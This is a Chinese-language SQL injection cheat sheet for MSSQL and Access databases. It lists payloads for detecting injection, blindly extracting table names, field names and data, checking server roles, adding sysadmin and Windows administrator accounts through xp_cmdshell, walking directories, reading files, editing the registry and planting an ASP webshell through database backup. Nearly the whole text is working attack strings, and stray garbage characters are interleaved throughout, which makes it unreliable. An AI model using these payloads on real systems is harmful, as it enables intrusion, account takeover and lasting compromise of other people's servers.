1.判断是否有注入;and 1=1 ;and 1=2 /��+wC�x#!
2.初步判断是否是mssql ;and user>0 �n�� +�v(t
Gq�=tR��`.
3.注入参数是字符'and [查询条件] and ''=' !L[�$�t~�z
�8B?*�?,n5
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �%45�*DT�
%E8HL�TEvl
5.判断数据库系统 ~@#s<a,%;�
ff�W-R)U|3
;and (select count(*) from sysobjects)>0 mssql l&�|T�b8_'
�XqLR2�d��
;and (select count(*) from msysobjects)>0 access aH7@:=�B��
�5�{gv�\S1
}�wB��!Bx2
\zh`z/�=92
6.猜数据库 ;and (select Count(*) from [数据库名])>0 :�]JM�sa�6
)�V�z=:.D�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 3qQ}U}-;�|
_RNP�_�$�a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 P�y��`7)S�
�|E��d?��s
9.(1)猜字段的ascii值(access) TH"<6�*f2L
��|J"\~%8
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 *5u�3d�`bW
/�hu�r6yI8
(2)猜字段的ascii值(mssql) }ssP�%��c]
W K(GR\@��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 00�LL&��ot
t�UksIUYD\
10.测试权限结构(mssql) Cp?6�vu|RA
�"#:h#uRUb
~t�LvD�[n[
C1#f/�o�->
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��ki'�<qa�
�=�� R���n
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��RDU 'l^
HBNX� �a��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��HXN.� ,[
vA{DF{�S�4
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- }tW1\@
�=
!��g�L�1�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- G�?^w
���<
z5_jx�&^Z
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- \j�<�aFOT(
:�� s�G�/�
;and 1=(select IS_MEMBER('db_owner'));-- �l1.eAs5U�
\qDY0hIv t
M�r*��CJgy
S�Ba��TbY0
11.添加mssql和系统的帐户 dUBf�.2�ry
c�j4�o[��l
;exec master.dbo.sp_addlogin username;-- _aU
:[v*!
;exec master.dbo.sp_password null,username,password;-- hltUf�5m'b
BI<(]`FP;s
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- J vl-=�~�
}R~C<3u�\2
;exec master.dbo.xp_cmdshell 'net user username password og1��Cj�{0
�R�T2�&^9-
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- -
i{1�h�"�
ac,�<�+y7A
;exec master.dbo.xp_cmdshell 'net user username password /add';-- j�*FpQiBoT
i!G<sfL���
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- hXD`Ol���X
xo�uBB��b=
b�)>l7nOc�
<O41��M\�,
12.(1)遍历目录 Q�O>)��ug+
�-��M+o�;�
;create table dirs(paths varchar(100), id int) /I��G3>|�R
n�p\�*r|�U
;insert dirs exec master.dbo.xp_dirtree 'c:\' #��'m�#Q6`
P�z�|}[Cx-
;and (select top 1 paths from dirs)>0 ��wH\
K�'/
A9WOu�*G1O
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &?�I3xzvK�
BwY�R��"��
�H?
�%I((+
bo??9�1B^7
(2)遍历目录 �"�H�Lh3L~
t �K��jk<�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Va4�AE)[/*
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 KkJE-k*D+w
Oiw!d6"Ovq
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 V0bKtg1f?-
!-�7<x"avm
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 >�J,I�xRGi
'N�&s$XB,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ���)"Wy/P�
?i\$U'2*z3
�}5�d|y��*
:2��lM7|@/
13.mssql中的存储过程 EkOn Rm_hn
d��CWq~[[
xp_regenumvalues 注册表根键, 子键
T2t��o!*T
�_���Ai�GD
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 >p3�S,2SM�
h2aO�-�y>K
xp_regread 根键,子键,键值名 �?#:�!!.I:
L(/wsw~y*
;exec xp_regread [3��]�h(�D
(#Xgfb"S�3
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 TrVQ]9;jWk
6�f
J5Y
iQ
xp_regwrite 根键,子键, 值名, 值类型, 值 OSK:Cb.-?F
$cGV)[KWp@
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 rD>q/�,X=\
/b�{Ufo3�v
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 i;67<�f�}-
�o6�X<FE#8
xp_regdeletevalue 根键,子键,值名 oTeQ�Y[%$�
��r�jH��W�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 jYh.$g<`0+
�++�}#pl8e
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ?o(Y\Y�J�f
�I -�XkxDw
M�E�NrP5AL
z�ENo2#{_N
14.mssql的backup创建webshell /j:-GJb*!u
]r1�Lr{7^S
use model Y2>*�'� nU
?nozB|*>ut
create table cmd(str image); !_:�|m��u'
+s5Yg,4�*
insert into cmd(str) values (''); Z��.�0mX#
zQt�x!�k=
backup database model to disk='c:\l.asp'; pe�U1
t:k?
l� 4cTN
@E
���6
��wD�
Eq�h&<�]q�
15.mssql内置函数 +B
O�u��U#
.:;�#[Z{�-
;and (select @@version)>0 获得Windows的版本号 k�J0o�tr2P
Rx�4�O?�7;
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �L;�'�v,s
\fC��}l
Ll
;and (select user_name())>0 爆当前系统的连接用户 ��.7�H*�F9
MLn?t^v�-�
;and (select db_name())>0 得到当前连接的数据库 l�d'A�axl&
c�6HH%���|
jhE�3@c@pT
v�?4��MndR
16.简洁的webshell �j`"cU$NRM
�_MGhG{p7t
use model �D�?cE$��P
|�R>I#NO5�
create table cmd(str image); zj'uKB�Dl�
�;Z#DB$o\�
insert into cmd(str) values (''); c��K2U�s+h
@�xAfD{}f!
backup database model to disk='g:\wwwtest\l.asp';
